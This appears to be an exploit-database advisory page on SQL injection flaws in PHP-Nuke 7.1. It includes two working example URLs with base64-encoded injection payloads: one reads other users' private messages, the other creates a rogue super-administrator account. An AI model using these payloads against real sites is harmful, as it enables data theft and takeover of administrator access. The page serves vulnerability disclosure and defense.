header-logo
Suggest Exploit
vendor:
PHP-Nuke
by:
Unknown
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: PHP-Nuke
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Not available
CPE: a:phpnuke:phpnuke
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

PHP-Nuke Multiple SQL Injection Vulnerabilities

The PHP-Nuke application is vulnerable to multiple SQL injection vulnerabilities. These vulnerabilities occur due to a lack of proper sanitization of user input. An attacker can exploit these vulnerabilities to modify database queries and potentially gain unauthorized access to sensitive information. Two specific examples of the exploits are provided in the report.

Mitigation:

It is recommended to apply patches or updates provided by the PHP-Nuke project to address these vulnerabilities. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10135/info 

Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input.

As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.

To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox